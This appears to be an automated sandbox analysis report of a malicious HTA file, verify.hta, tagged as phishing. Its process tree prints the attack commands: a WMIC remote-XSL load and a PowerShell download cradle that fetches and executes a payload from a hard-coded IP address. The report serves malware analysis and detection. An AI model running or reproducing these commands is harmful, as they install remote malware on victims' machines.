e1781322c82511bd2859999c9627453450f2e68cc7c76b20a3893820b99e3b19

Analysis

max time kernel
117s
max time network
128s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
20/11/2024, 14:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

verify.hta
Size

2KB
MD5

37ca0a9229af22173e81d6ace1f49a3f
SHA1

7b15c031a6673d2d48d045d750e0ef17df1ed46f
SHA256

e1781322c82511bd2859999c9627453450f2e68cc7c76b20a3893820b99e3b19
SHA512

fc6af18e2fc1c4602de7bcfff1c4ea233bda838a144bd2c13e3daf3ef5c79639d876a502881b340cd6646e1ecf7ed917b6e4f0a9f11c77128811671fbf6a1edb

Score

8^/10

google discovery phishing

Malware Config

Signatures

Blocklisted process makes network request 10 IoCs

flow	pid	Process
5	2624	mshta.exe
6	2624	mshta.exe
10	2624	mshta.exe
11	2624	mshta.exe
14	2624	mshta.exe
15	2624	mshta.exe
18	2624	mshta.exe
19	2624	mshta.exe
21	2476	WMIC.exe
22	620	powershell.exe

A potential corporate email address has been identified in the URL: [email protected]
phishing
Detected potential entity reuse from brand GOOGLE.
phishing google
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
408	timeout.exe
2348	timeout.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
620	powershell.exe

Suspicious use of AdjustPrivilegeToken 41 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	2476	WMIC.exe
Token: SeSecurityPrivilege	2476	WMIC.exe
Token: SeTakeOwnershipPrivilege	2476	WMIC.exe
Token: SeLoadDriverPrivilege	2476	WMIC.exe
Token: SeSystemProfilePrivilege	2476	WMIC.exe
Token: SeSystemtimePrivilege	2476	WMIC.exe
Token: SeProfSingleProcessPrivilege	2476	WMIC.exe
Token: SeIncBasePriorityPrivilege	2476	WMIC.exe
Token: SeCreatePagefilePrivilege	2476	WMIC.exe
Token: SeBackupPrivilege	2476	WMIC.exe
Token: SeRestorePrivilege	2476	WMIC.exe
Token: SeShutdownPrivilege	2476	WMIC.exe
Token: SeDebugPrivilege	2476	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2476	WMIC.exe
Token: SeRemoteShutdownPrivilege	2476	WMIC.exe
Token: SeUndockPrivilege	2476	WMIC.exe
Token: SeManageVolumePrivilege	2476	WMIC.exe
Token: 33	2476	WMIC.exe
Token: 34	2476	WMIC.exe
Token: 35	2476	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2476	WMIC.exe
Token: SeSecurityPrivilege	2476	WMIC.exe
Token: SeTakeOwnershipPrivilege	2476	WMIC.exe
Token: SeLoadDriverPrivilege	2476	WMIC.exe
Token: SeSystemProfilePrivilege	2476	WMIC.exe
Token: SeSystemtimePrivilege	2476	WMIC.exe
Token: SeProfSingleProcessPrivilege	2476	WMIC.exe
Token: SeIncBasePriorityPrivilege	2476	WMIC.exe
Token: SeCreatePagefilePrivilege	2476	WMIC.exe
Token: SeBackupPrivilege	2476	WMIC.exe
Token: SeRestorePrivilege	2476	WMIC.exe
Token: SeShutdownPrivilege	2476	WMIC.exe
Token: SeDebugPrivilege	2476	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2476	WMIC.exe
Token: SeRemoteShutdownPrivilege	2476	WMIC.exe
Token: SeUndockPrivilege	2476	WMIC.exe
Token: SeManageVolumePrivilege	2476	WMIC.exe
Token: 33	2476	WMIC.exe
Token: 34	2476	WMIC.exe
Token: 35	2476	WMIC.exe
Token: SeDebugPrivilege	620	powershell.exe

Suspicious use of WriteProcessMemory 36 IoCs

description	pid	Process	procid_target
PID 2624 wrote to memory of 1600	2624	mshta.exe	30
PID 2624 wrote to memory of 1600	2624	mshta.exe	30
PID 2624 wrote to memory of 1600	2624	mshta.exe	30
PID 2624 wrote to memory of 1600	2624	mshta.exe	30
PID 2624 wrote to memory of 408	2624	mshta.exe	32
PID 2624 wrote to memory of 408	2624	mshta.exe	32
PID 2624 wrote to memory of 408	2624	mshta.exe	32
PID 2624 wrote to memory of 408	2624	mshta.exe	32
PID 1600 wrote to memory of 2464	1600	cmd.exe	34
PID 1600 wrote to memory of 2464	1600	cmd.exe	34
PID 1600 wrote to memory of 2464	1600	cmd.exe	34
PID 1600 wrote to memory of 2464	1600	cmd.exe	34
PID 1600 wrote to memory of 2476	1600	cmd.exe	35
PID 1600 wrote to memory of 2476	1600	cmd.exe	35
PID 1600 wrote to memory of 2476	1600	cmd.exe	35
PID 1600 wrote to memory of 2476	1600	cmd.exe	35
PID 2476 wrote to memory of 2628	2476	WMIC.exe	37
PID 2476 wrote to memory of 2628	2476	WMIC.exe	37
PID 2476 wrote to memory of 2628	2476	WMIC.exe	37
PID 2476 wrote to memory of 2628	2476	WMIC.exe	37
PID 2628 wrote to memory of 2592	2628	cmd.exe	39
PID 2628 wrote to memory of 2592	2628	cmd.exe	39
PID 2628 wrote to memory of 2592	2628	cmd.exe	39
PID 2628 wrote to memory of 2592	2628	cmd.exe	39
PID 2592 wrote to memory of 1236	2592	cmd.exe	40
PID 2592 wrote to memory of 1236	2592	cmd.exe	40
PID 2592 wrote to memory of 1236	2592	cmd.exe	40
PID 2592 wrote to memory of 1236	2592	cmd.exe	40
PID 2628 wrote to memory of 620	2628	cmd.exe	41
PID 2628 wrote to memory of 620	2628	cmd.exe	41
PID 2628 wrote to memory of 620	2628	cmd.exe	41
PID 2628 wrote to memory of 620	2628	cmd.exe	41
PID 2624 wrote to memory of 2348	2624	mshta.exe	43
PID 2624 wrote to memory of 2348	2624	mshta.exe	43
PID 2624 wrote to memory of 2348	2624	mshta.exe	43
PID 2624 wrote to memory of 2348	2624	mshta.exe	43

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\verify.hta"
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2624
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c echo os get /format:"http://3.140.250.70/WMI.xsl" | C:\Windows\System32\wbem\WMIC.exe
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1600
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo os get /format:"http://3.140.250.70/WMI.xsl" "
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2464
- - C:\Windows\SysWOW64\wbem\WMIC.exe
    C:\Windows\System32\wbem\WMIC.exe
    3⤵
    - Blocklisted process makes network request
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2476
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start /b echo iex((New-Object Net.WebClient).DownloadString('http://3.140.250.70/payloade')) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2628
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" start /b echo iex((New-Object Net.WebClient).DownloadString('http://3.140.250.70/payloade')) "
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2592
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K echo iex((New-Object Net.WebClient).DownloadString('http://3.140.250.70/payloade'))
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1236
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -
        5⤵
        Blocklisted process makes network request
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:620
- C:\Windows\SysWOW64\timeout.exe
  "C:\Windows\System32\timeout.exe" /T 2 /nobreak
  2⤵
  - System Location Discovery: System Language Discovery
  - Delays execution with timeout.exe
  PID:408
- C:\Windows\SysWOW64\timeout.exe
  "C:\Windows\System32\timeout.exe" /T 1 /nobreak
  2⤵
  - System Location Discovery: System Language Discovery
  - Delays execution with timeout.exe
  PID:2348

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UQFHO95Z\favicon[1].ico

Filesize
5KB

MD5
f3418a443e7d841097c714d69ec4bcb8

SHA1
49263695f6b0cdd72f45cf1b775e660fdc36c606

SHA256
6da5620880159634213e197fafca1dde0272153be3e4590818533fab8d040770

SHA512
82d017c4b7ec8e0c46e8b75da0ca6a52fd8bce7fcf4e556cbdf16b49fc81be9953fe7e25a05f63ecd41c7272e8bb0a9fd9aedf0ac06cb6032330b096b3702563

Download Submit